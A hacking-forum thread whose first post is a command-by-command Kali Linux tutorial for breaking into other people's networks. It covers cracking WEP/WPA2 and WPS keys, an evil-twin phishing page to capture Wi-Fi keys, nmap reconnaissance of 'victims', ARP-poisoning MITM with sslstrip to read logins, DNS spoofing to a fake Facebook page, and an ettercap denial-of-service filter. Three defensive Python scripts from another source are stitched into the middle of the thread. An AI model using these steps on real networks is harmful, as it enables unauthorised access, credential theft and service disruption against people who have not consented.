Tutorial [Kali Linux] Get access, Find and attack into a network
hunt3r972
Post: #1
[Kali Linux] Get access, Find and attack into a network
TABLE OF CONTENTS

I. Get Into The Network
  • Wired network
  • WEP protected
  • WPA2 protected

II. Find information about the network and the host
  • The network
  • The nodes

III. Scan a target (OS Fingerprinting)

IV. Attacking the victim
  • MITM Attack
  • DNS Spoofing Attack
  • DOS Attack

I. Get Into The Network
First, you must know what kind of network you are attacking: a Wifi or a wired network?
  • Wired Network
If you are on a wired network, you are lucky, you don't have a lot to do: connect an Ethernet cable and you're OK. If you don't have physical access, you will have to find a way to get it.

  • WEP protected
1. Brute Force Attack
If the network is a Wifi network protected with a WEP key, use this script to crack the key. A WEP key is the worst protection for a Wifi network. Brute force attacks are very efficient and fast against it.

So here:
MACADDRESSAP = MAC address of the access point
MACADDRESSVICTIM = MAC address of the victim connected to the access point
CHANNEL = channel used by the access point
APNAME = Access Point Name

New terminal

1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. airodump-ng mon0 [it will list the detected access point on mon0]

4. airodump-ng -c CHANNEL -w wepcrack --bssid MACADDRESSAP mon0 [focus the scan on the victim network]
New terminal

5. aireplay-ng -1 0 -e APNAME -a MACADDRESSAP -b MACADDRESSAP -h MACADDRESSVICTIM mon0 [deauthentication + fake authentication on the victim network by mac address dumping]

New terminal

6. aireplay-ng -3 -e APNAME -a MACADDRESSAP -b MACADDRESSAP -h MACADDRESSVICTIM -x 600 -r wepcrack*.cap mon0 [ARP request replay attack on the access point. It will put it in the file named wepcrack.cap. Wait for ~20 000 IVS]

New terminal

7. aircrack-ng wepcrack*.cap [start brute force cracking on the data stored in the file wepcrack.cap]
  • WPA2 protected
WPA2 encryption is very hard to crack. A good WPA2 key with caps, numbers and normal chars with 20 characters is not impossible to crack, but you will need over ten years to crack it. I bet $2000 that you will give up before finding it. Anyway, I will present five ways to crack it: the dictionary attack, the brute force attack (with and without CUDA), the evil twin method and the WPS PIN brute force attack.

1. Dictionary Attack
New terminal
1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. airodump-ng mon0 [it will list the detected access point on mon0]

4. airodump-ng -c CHANNEL -w wpacrack --bssid MACADDRESSAP --ivs mon0 [focus the scan on the victim network]

New terminal

5. aireplay-ng -0 1 -a MACADDRESSAP -c MACADDRESSVICTIM mon0 [handshaking the victim access point by deauthentication + fake authentication by mac address dumping]

New terminal

6. aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs [start the comparison between the data stored in wpacrack-01.ivs and the dictionary file which is located in ~/pentest/passwords/john/password.lst]

2. Brute Force Attack
If you have information about the length and the characters in the password, you can do more precise password generation. Please follow this tutorial to understand how it works:
http://www.hackcommunity.com/Thread-Word...ght=crunch

New terminal
1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. airodump-ng mon0 [it will list the detected access point on mon0]

4. airodump-ng -c CHANNEL -w wpacrack --bssid MACADDRESSAP --ivs mon0 [focus the scan on the victim network]

New terminal

5. aireplay-ng -0 1 -a MACADDRESSAP -c MACADDRESSVICTIM mon0 [handshaking the victim access point by deauthentication + fake authentication by mac address dumping]

New terminal

6. /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ADRESSEMACAP -w [start generating all possibilities with mixalpha-numeric chars between 8 and 16 chars and compare with the data stored in wpacrack-01.ivs]

3. Brute Force Attack (CUDA)
You will have to install pyrit:
Go to http://code.google.com/p/pyrit/downloads/list and download pyrit and cpyrit-cuda

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

New terminal
1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. airodump-ng mon0 [it will list the detected access point on mon0]

4. airodump-ng -c CHANNEL -w wpacrack --bssid MACADDRESSAP mon0 [focus the scan on the victim network]

New terminal

5. aireplay-ng -0 1 -a MACADDRESSAP -c MACADDRESSVICTIM mon0 [handshaking the victim access point by deauthentication + fake authentication by mac address dumping]

New terminal

6. /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ADRESSEMACAP -i - attack_passthrough [start generating all possibilities with mixalpha-numeric chars between 8 and 16 chars and compare with the data stored in wpacrack-01.ivs]

If you have an error:

a. pyrit -r wpacrack-01.cap -o new.cap stripLive

b. /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ADRESSEMACAP -i - attack_passthrough

4. Evil Twin Attack

Start apache2: /etc/init.d/apache2 start
Start mysql: /etc/init.d/mysql start

Download this file http://www.4shared.com/file/b1FfNjdd/Ver...2=403tNull
You can use these free accounts to dowload it http://www.bugmenot.com/view/4shared.com

Put the files in /var/www/ -> Type "localhost" in your browser without the " " to check that it works

1. airmon-ng start wlan0

2. airodump-ng mon0

New terminal

3. cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.backup

4. nano /etc/dhcp/dhcpd.conf

ddns-update-style interim;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}

5. airbase-ng -e "ACCESPOINTNAME" -c CHANNEL -a MACACCESPOINT mon0

New terminal

6. ifconfig at0 up

7. ifconfig at0 192.168.2.129 netmask 255.255.255.128

8. route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

9. iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o INTERFACECONNECTERAINTERNET -j MASQUERADE
echo > '/var/lib/dhcp/dhcpd.leases'

10. dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0

11. echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

12. Put files into /var/www/ -> Test it by typing the IP address of at0 in your web browser

13. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination ADRESSEIPat0:80
iptables -t nat -A POSTROUTING -j MASQUERADE

New terminal

14. airodump-ng mon0

15. airodump-ng --bssid ADRESSEMACAPVICTIM -c CHANNEL mon0

16. aireplay-ng -0 0 -a ADRESSEMACAP -c MACADRESSEVICTIME mon0

When the victim has entered the key, stop the deauth and airbase. He will reconnect to the real AP.

17. mysql -u root -p
use wpa2;
select * from content;

Now you can take the WPA2 key from the MySQL database and use it to connect to the access point. Of course this method will work with "stupid" users. If you have some knowledge of HTML / CSS you can try to make some templates looking like the one used by the ISP of your victim to make it look more "real".

5. WPS Pin Brute Force Attack

1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. wash -i mon0 [it will list the access point with WPS activated]

4. reaver -i mon0 -b MACADDRESSAP -vv [start brute force cracking on the WPS key]

Do you want to protect your Wifi network? Follow these rules:
Disable WPS
Replace your WEP key with a WPA2 key
Use a 20+ character key with normal characters, capitals and numbers
Enable mac address filtering
Assign a computer name to each MAC address
Reduce your radio emission power
Change your router default login
Disable remote administration on your router (or change the port)

II. Finding information about your network
Before you start doing manipulations, you must know where you are. So you must find some basic information.
  • The network
ifconfig eth0/wlan0

eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx:
inet addr:172.23.137.73 Bcast:172.23.191.255 Mask:255.255.192.0
inet6 addr: fe80::f66d:4ff:fe1b:40a2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:518534 errors:0 dropped:0 overruns:0 frame:0
TX packets:6461 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:74181339 (74.1 MB) TX bytes:519778 (519.7 KB)
Interrupt:42 Base address:0x6000

So here I know that my IP address is 172.23.137.73 and the mask is 255.255.192.0. By doing a logical AND between my IP address and the mask, I can find that my network address is 172.23.128.0. So here we have the main information about the network. How do you do a logical AND to find the network IP address? You have to translate each octet into binary.

So for 172.23.137.73 I will have: 10101100.00010111.10001001.01001001
and for 255.255.192.0 I will have: 11111111.11111111.11000000.00000000

Now you will compare the first bit in the first octet of the HostIP with the first bit in the first octet of the Mask, then the second bit in the first octet of the HostIP with the second bit in the first octet of the Mask, etc. You must do it for every bit. The rule is: 0 AND 0 = 0, 0 AND 1 = 0 and 1 AND 1 = 1
HostIP : 10101100.00010111.10001001.01001001
Mask : 11111111.11111111.11000000.00000000
Network address : 10101100.00010111.10000000.00000000

Now translate the binary network address into decimal and you have 172.23.128.0

Now only one piece of information is missing: the gateway address. This one is very useful for attacks like Man In The Middle. To find it, type:

route

Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 172.23.128.1 0.0.0.0 UG 100 0 0 eth0
172.23.128.0 * 255.255.192.0 U 0 0 0 eth0
  • The nodes
    ETHERAPE (GRAPHIC)
This must be the only graphical program I use
etherape -i eth0/wlan0 -m ip
It opens the etherape GUI; then go to View > Nodes. You will see a lot of IP addresses or NetBIOS names. Now you will have to find your target.

Finding a node's IP address from its NetBIOS name, or its NetBIOS name from its IP address
To be sure that your target is the correct target, you will have to find some basic information.
Find a node's IP address:
net lookup SOMEONE-PC
root@bt:~# net lookup SOMEONE-PC
172.23.135.237

Check a node's NetBIOS name from its IP address:
nbtscan 172.23.135.237
root@bt:~# nbtscan 172.23.135.237
Doing NBT name scan for addresses from 172.23.135.237

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
172.23.135.237 SOMEONE-PC <server> <unknown> xx-xx-xx-xx-xx-xx

Here you have basic information. To get more specific information about your target, follow the next step.

nmap can also perform simple scans. You can use this command:

nmap -sn 172.23.130.0-255

Type nmap --help to see which types of IP range can be used.

III. Scan a target
Before you start attacking the target you chose, you must have some more advanced information like the open ports, the operating system etc. Why the ports? Because they are the open doors to talk with the victim. And why the OS? Because thanks to that, you will know which OS you will have to search exploits for.

nmap -sS -Pn 172.23.135.237 -A
It will do a TCP scan (-sS), use passive discovery instead of ICMP ping, which is blocked by most antivirus software (-Pn), and give information about the OS (-A).
This is an example of scan with nmap:

Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-02 20:59 AST
Nmap scan report for 172.23.135.237
Host is up (0.00060s latency).
Not shown: 991 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open netbios-ssn
554/tcp open rtsp?
2869/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
10243/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Not Found
49158/tcp open msrpc Microsoft Windows RPC
50002/tcp open tcpwrapped

MAC Address: xx:xx:xx:xx:xx:xx (Quanta Computer)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::professional cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2 or Windows Server 2008
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: NETBIOSNAME-PC, NetBIOS user: <unknown>, NetBIOS MAC: xx:xx:xx:xx:xx:xx (Quanta Computer)
|_smbv2-enabled: Server supports SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Home Premium 7601 Service Pack 1 (Windows 7 Home Premium 6.1)
| NetBIOS computer name: NETBIOSNAME-PC
| Workgroup: WORKGROUP
|_ System time: 2012-12-02 21:33:24 UTC-4.5

TRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 172.23.135.237


OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 238.11 seconds

After using nmap to check the OS and whether there are open ports, you can do an advanced scan to get more information about potential weaknesses on the victim computer. To install Nessus, you can use my tutorial:

http://www.hackcommunity.com/Thread-How-...-on-BT5-R3

When you are on the web interface, go into Scans, click on Add in the menu bar, choose Internal Network, give a name to remember which computer you are scanning and type the IP address of your victim in the last field.

IV. Attacking the victim
It's important to say that a good antivirus will block these attacks. A well built network will make this attack harder to perform.

1. MITM Attack
The Man In The Middle attack is an attack where you can capture the traffic between the victim and the gateway thanks to ARP poisoning. During this attack, the victim computer will think that you are the gateway and all its traffic will be sent to your computer. Then your computer will send it to the gateway to make it believe that it is still in communication with the victim (connection not interrupted).

To avoid this attack, get a good antivirus and set a static ARP cache if possible.

Normal situation:
Victim Computer <--------------------> Gateway <---------------------> INTERNET

Attack situation:
Victim Computer <--------------------> Hacker Computer <---------------------> Gateway <---------------------> INTERNET

1. nano /etc/etter.conf or nano /usr/local/etc

Make these modifications:

ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

#---------------
#Linux after Modification
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

CTRL+O to write out then CTRL+X to quit

2. echo 1 > /proc/sys/net/ipv4/ip_forward

3. cat /proc/sys/net/ipv4/ip_forward (0 = port forwarding not enabled, 1 = port forwarding enabled)

4. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

5. ettercap -TqM arp:remote /IPVICTIM/ /IPGATEWAY/ -i eth0/wlan0

New terminal

6. sslstrip -a -l 8080 -w capture.txt

TO STOP THIS ATTACK PRESS Q IN THE ETTERCAP CONSOLE BECAUSE YOU NEED TO RE-ARP THE VICTIM! DON'T USE CTRL+C! SSLSTRIP CAN BE STOPPED WITH CTRL+C

Don't forget that you can change the listening port. See the example below:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 28960
sslstrip -a -l 28960 -w capture.txt

Just remember that the port used in the first command line must be the same in the sslstrip command line

To quickly summarize how sslstrip works:
Most people don't type "https://www.facebook.com" in their web browser. They use redirected URLs or links most of the time, like http://www.facebook.com or http://facebook.com, or a link from a Google search. When you are the MITM, sslstrip sniffs the traffic and each time someone is about to be redirected to an https website, it replaces "https" with "http". So the user ends up on an http website with no encrypted connection. This is why you can see the login in clear. If you type https://site.com directly, you will notice that your browser warns you about the missing/forged certificate, asking you to leave the page.

You can also use arpspoof to do it instead of ettercap.

1. echo 1 > /proc/sys/net/ipv4/ip_forward

2. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

3. arpspoof -i INTERFACE -t GATEWAYIP IPVICTIM
arpspoof -i INTERFACE -t IPVICTIM GATEWAYIP

4. ettercap -Tq /IPPASSERELLE/ /IPVICTIME/ -i INTERFACE or USE WIRESHARK

5. sslstrip -a -l 8080 -w capture.txt

2. DNS Spoofing Attack
This attack can be very useful to get information about the victim or to steal passwords by making a fake web page with an authentication system like Facebook's. With this attack, when your victim types http://www.facebook.com for example, it will redirect them to another website you made. You can run a PHP script to steal information like the public IP address, the web browser used etc. To understand how it works, you should read a document about how DNS servers work and how to understand the zone file. This is how to do this attack:

1. cd /usr/share/ettercap

2. nano etter.dns

An example of an entry:
facebook.com A 74.125.140.103
*.facebook.com A 74.125.140.103
www.facebook.com PTR 74.125.140.103
When your victim types http://www.facebook.com for example, he will be redirected to the IP address of your fake website. You can do it for *www.google.* or any other website. Then do this:

3. ettercap -i eth0/wlan0 -TqP dns_spoof -M ARP /IPVICTIM/ //

With the dig command, you can see what a DNS zone looks like. Some information is missing (like the time between two refreshes, the TTL etc.). This is an example for google.com:
root@bt:~# dig www.google.com

; <<>> DiG 9.7.0-P1 <<>> www.google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 50936
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 4, ADDITIONAL: 4

;; QUESTION SECTION:
;www.google.com. IN A

;; ANSWER SECTION:
www.google.com. 187 IN A 74.125.130.147
www.google.com. 187 IN A 74.125.130.99
www.google.com. 187 IN A 74.125.130.103
www.google.com. 187 IN A 74.125.130.104
www.google.com. 187 IN A 74.125.130.105
www.google.com. 187 IN A 74.125.130.106

;; AUTHORITY SECTION:
google.com. 278473 IN NS ns4.google.com.
google.com. 278473 IN NS ns1.google.com.
google.com. 278473 IN NS ns2.google.com.
google.com. 278473 IN NS ns3.google.com.

;; ADDITIONAL SECTION:
ns1.google.com. 105387 IN A 216.239.32.10
ns2.google.com. 105387 IN A 216.239.34.10
ns3.google.com. 105387 IN A 216.239.36.10
ns4.google.com. 105387 IN A 216.239.38.10

;; Query time: 57 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Sun Dec 9 14:24:44 2012
;; MSG SIZE rcvd: 264

3. DOS Attack
During this attack, the victim will not be able to navigate on the internet.

Open a new terminal and type this in it:

if (ip.src == 'IPVICTIM' || ip.dst == 'IPVICTIM') {
drop();
kill();
msg("Packet Dropped\n");
}

Save it with the name dos.eft. Now type this in the terminal:

1. echo 1 > /proc/sys/net/ipv4/ip_forward

2. etterfilter dos.eft -o dos.ef

3. ettercap -TqF dos.ef -M ARP /IPVICTIM/ // -i eth0/wlan0

If you want to attack the whole subnet, just put: ettercap ... // // -i eth0/wlan0

OK so here you learnt:
how to break a WEP or WPA key to get into a network
how to find information about the network you are connected to
how to find information about a node (if you want to attack a specific target)
how to do some simple attacks like the MITM attack, DNS spoofing attack and DoS attack to break a node's connection (which can be blocked easily by a good antivirus)

This is just a small part of network exploitation. I will say that this part is accessible to every kid who wants to search just a little bit on Google. The next step will be about the Metasploit framework, a powerful tool for real pentesting. You will learn how to do a real pentest on a network by using exploits, payloads, shellcodes etc. I'll start writing a tutorial about it when I understand it correctly.
(This post was last modified: 01-06-2014 02:02 AM by hunt3r972.)
11-21-2012 01:05 AM
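The logical AND from section II, as an added Python example (my code, not from the post above): it converts each octet to binary and ANDs bit by bit exactly as the post describes, then derives the broadcast address and checks that the gateway from the route output sits in the same network. The addresses are the ones from the post's ifconfig and route output.

```python
# Added example: the network-address calculation from section II, done the way
# the post describes (translate each octet to binary, AND bit by bit), plus the
# broadcast address and a same-network check. Not code from the original post.

def to_binary(addr: str) -> str:
    """Dotted decimal -> dotted binary, e.g. 172.23.137.73 -> 10101100.00010111.10001001.01001001"""
    octets = [int(o) for o in addr.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {addr}")
    return ".".join(f"{o:08b}" for o in octets)


def from_binary(bits: str) -> str:
    """Dotted binary -> dotted decimal."""
    return ".".join(str(int(octet, 2)) for octet in bits.split("."))


def bitwise(host: str, mask: str, rule) -> str:
    """Apply rule(host_bit, mask_bit) -> '0'/'1' to every bit, octet by octet."""
    result = []
    for h_oct, m_oct in zip(to_binary(host).split("."), to_binary(mask).split(".")):
        result.append("".join(rule(h, m) for h, m in zip(h_oct, m_oct)))
    return from_binary(".".join(result))


def network_address(host: str, mask: str) -> str:
    """The post's rule: 0 AND 0 = 0, 0 AND 1 = 0, 1 AND 1 = 1."""
    return bitwise(host, mask, lambda h, m: "1" if h == "1" and m == "1" else "0")


def broadcast_address(host: str, mask: str) -> str:
    """Keep the network bits, set every host bit (where the mask is 0) to 1."""
    return bitwise(host, mask, lambda h, m: h if m == "1" else "1")


def prefix_length(mask: str) -> int:
    """255.255.192.0 -> 18; rejects masks whose 1 bits are not contiguous."""
    bits = to_binary(mask).replace(".", "")
    ones = bits.count("1")
    if bits != "1" * ones + "0" * (32 - ones):
        raise ValueError(f"non-contiguous netmask: {mask}")
    return ones


def same_network(a: str, b: str, mask: str) -> bool:
    """True when both addresses AND to the same network address."""
    return network_address(a, mask) == network_address(b, mask)


if __name__ == "__main__":
    host, mask = "172.23.137.73", "255.255.192.0"   # from the post's ifconfig output
    gateway = "172.23.128.1"                         # from the post's route output
    print("HostIP :", to_binary(host))
    print("Mask   :", to_binary(mask))
    print("Network:", to_binary(network_address(host, mask)), "=", network_address(host, mask))
    print("Bcast  :", broadcast_address(host, mask), f"(/{prefix_length(mask)})")
    print("gateway on this network:", same_network(host, gateway, mask))
```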
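For the "static ARP cache" advice in section IV, an added example (mine, not from the post): a detector that reads ARP replies in tcpdump-style text and flags the gateway's MAC changing, a binding changing mid-capture, or one MAC claiming several IPs, which is what ARP poisoning looks like on the wire. The capture lines and the pinned gateway MAC are constructed values, not a real capture.

```python
# Added example, not from the original post: detect the ARP poisoning that the
# MITM section relies on, from the defender's side. Input is text in the style
# of `tcpdump -n -e arp`; the lines below are constructed, not a real capture.
import re
from collections import defaultdict

SAMPLE_CAPTURE = """\
12:00:01.000 ARP, Reply 172.23.128.1 is-at 00:11:22:33:44:01, length 28
12:00:02.000 ARP, Reply 172.23.135.237 is-at 00:11:22:33:44:02, length 28
12:00:03.000 ARP, Request who-has 172.23.128.1 tell 172.23.135.237, length 28
12:00:04.000 ARP, Reply 172.23.128.1 is-at 00:11:22:33:44:99, length 28
12:00:05.000 ARP, Reply 172.23.135.237 is-at 00:11:22:33:44:99, length 28
12:00:06.000 ARP, Reply 172.23.128.1 is-at 00:11:22:33:44:99, length 28
"""

# Assumed "real" gateway MAC: the binding you would pin with `arp -s 172.23.128.1 <mac>`
# (the static ARP cache the post recommends). Constructed value.
PINNED = {"172.23.128.1": "00:11:22:33:44:01"}

ARP_REPLY = re.compile(r"ARP, Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9A-Fa-f:]{17})")


def parse_replies(capture: str):
    """Yield (ip, mac) for each ARP reply; requests carry no is-at binding."""
    for line in capture.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_spoofing(capture: str, pinned=None) -> list:
    """
    Return de-duplicated alert strings for three symptoms of ARP poisoning:
    a pinned binding contradicted, an IP's MAC changing mid-capture, and one
    MAC claiming several IPs (the gateway AND the victim at the same time).
    """
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    first_seen = {}             # ip -> MAC first advertised for it
    claims = defaultdict(set)   # mac -> IPs it has claimed
    alerts, emitted = [], set()

    def alert(msg):
        if msg not in emitted:
            emitted.add(msg)
            alerts.append(msg)

    for ip, mac in parse_replies(capture):
        if ip in pinned and mac != pinned[ip]:
            alert(f"pinned binding violated: {ip} advertised as {mac}, expected {pinned[ip]}")
        elif ip in first_seen and first_seen[ip] != mac:
            alert(f"binding changed: {ip} was {first_seen[ip]}, now {mac}")
        first_seen.setdefault(ip, mac)
        claims[mac].add(ip)
        if len(claims[mac]) > 1:
            alert(f"one MAC claims several IPs: {mac} -> {sorted(claims[mac])}")
    return alerts


if __name__ == "__main__":
    for a in detect_arp_spoofing(SAMPLE_CAPTURE, PINNED):
        print("ALERT", a)
```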
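For the DNS spoofing part of section IV, an added defender-side example (mine, not from the post): it parses A records out of dig-style output, the format the post shows for google.com, and flags answers that point a public name at a LAN/private address or that share no address with what a trusted resolver returned. The victim-side answers, the reference answers and the 203.0.113.0/24 stand-in addresses are constructed.

```python
# Added example, not from the original post: a defender-side check for the DNS
# spoofing described in section IV. It parses A records out of dig-style output
# and flags answers that point a public name at a LAN/private address, or that
# share no address with a trusted resolver. All sample answers are constructed.
import ipaddress
import re

A_RECORD = re.compile(r"^(\S+?)\.?\s+(\d+)\s+IN\s+A\s+(\d{1,3}(?:\.\d{1,3}){3})\s*$")


def parse_a_records(dig_output: str) -> dict:
    """{name: set(ips)} from the ANSWER SECTION lines of a dig run."""
    records = {}
    for line in dig_output.splitlines():
        m = A_RECORD.match(line.strip())
        if m:   # ';' comment/question lines and NS lines never match
            records.setdefault(m.group(1).lower(), set()).add(m.group(3))
    return records


def check_answers(local: dict, reference: dict, local_net: str) -> list:
    """
    local: answers seen from the LAN resolver; reference: answers from a trusted
    resolver queried out of band; local_net: the LAN in CIDR form (section II).
    Returns (name, address, reason) tuples.
    """
    net = ipaddress.ip_network(local_net, strict=False)
    findings = []
    for name, ips in sorted(local.items()):
        for ip in sorted(ips):
            addr = ipaddress.ip_address(ip)
            if addr in net or addr.is_private:
                findings.append((name, ip, "public name answered with a LAN/private address"))
        ref = reference.get(name)
        if ref is not None and not (ips & ref):
            findings.append((name, ",".join(sorted(ips)), "no overlap with trusted resolver"))
    return findings


# Constructed: what a victim on 172.23.128.0/18 sees while a spoofed etter.dns is in play.
LOCAL_DIG = """\
;; QUESTION SECTION:
;www.facebook.com.              IN      A

;; ANSWER SECTION:
www.facebook.com.       60      IN      A       172.23.135.10
facebook.com.           60      IN      A       74.125.140.103
www.google.com.         187     IN      A       74.125.130.147
www.google.com.         187     IN      A       74.125.130.99

;; AUTHORITY SECTION:
google.com.             278473  IN      NS      ns1.google.com.
"""

# Constructed: the same names from a resolver reached over a trusted path
# (203.0.113.0/24 is a documentation range, used here as a stand-in).
REFERENCE = {
    "www.facebook.com": {"203.0.113.20"},
    "facebook.com": {"203.0.113.20"},
    "www.google.com": {"74.125.130.147", "74.125.130.99", "74.125.130.103"},
}

if __name__ == "__main__":
    for name, ip, why in check_answers(parse_a_records(LOCAL_DIG), REFERENCE, "172.23.137.73/18"):
        print(f"SUSPECT {name} -> {ip}: {why}")
```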
hunt3r972
Post: #2
RE: The best way to scan a Network
Just an up ... I really want to know if the way I do is good.
11-24-2012 02:48 AM
unknownAttacker
Post: #3
RE: The best way to scan a Network
It's generally good, although I prefer to add more stuff to the nmap command as nmap has a lot of useful stuff. My command of choice is:
nmap -sS -T4 -A -v -v -v -v --script address-info,auth-owners,banner,unusual-port
12-02-2012 11:10 PM
hunt3r972
Post: #4
RE: Find potential targets and informations on your network
OK thanks. So now I've got enough info to start metasploiting the target?
12-03-2012 04:08 AM
unknownAttacker
Post: #5
RE: Find potential targets and informations on your network
After running this nmap command, you'll know what services are running. Search whether those services have public, remote exploits. If they have, then yes, you can metasploit. If not, you need to get creative and find another way in.
12-03-2012 12:26 PM
bluedog.tar.gz
Post: #6
RE: [Tutorial] Find potential targets and informations on your network
Nice thread, contains a lot of useful information for a lot of us.

Thanks

12-12-2012 06:43 PM
unknownAttacker
Post: #7
RE: [Tutorial] Find potential targets and informations on your network
Hey, this tutorial is getting better and better. Might be a great guide to WiFi exploitation soon!
12-13-2012 09:52 PM
hunt3r972
Post: #8
RE: [Tutorial] Find potential targets and informations on your network
I'll try to update it as often as I can.
12-14-2012 12:33 AM
urge
Post: #9
RE: [Tutorial] Find potential targets and informations on your network
Very nice tutorial, thanks for sharing.
12-14-2012 10:07 PM
hunt3r972
Post: #10
RE: [Tutorial] Find potential targets and informations on your network
I will make an update to this tutorial about the MITM, DOS and DNS spoof attacks. I will stop using ettercap because it has not been updated for a while, so it's not stable. I think that I've found another way to do it but I must test it first. I'm now on school vacation so I will try the evil twin method for WPA2 cracking.

Do you want more theory in the tutorial (to understand what corresponds to which step)?
(This post was last modified: 12-21-2012 03:15 AM by hunt3r972.)
12-21-2012 03:12 AM
Faner
Post: #11
RE: [Tutorial] Find potential targets and informations on your network
Nice tutorial. No idea where you got enough patience to write it. I just wonder how long it would take to brute force a 16 char WPA2 key...

According to http://lastbit.com/pswcalc.asp it would take about 3346212221363636000 years.
And that's if the checking speed is 500000/sec.
(This post was last modified: 12-30-2012 09:59 PM by Faner.)
12-30-2012 07:34 PM
V1P3R
Post: #12
RE: [Tutorial] Find potential targets and informations on your network
Wow, I just started BackTrack and it helped me a lot.
Thanks dude.
12-30-2012 07:58 PM



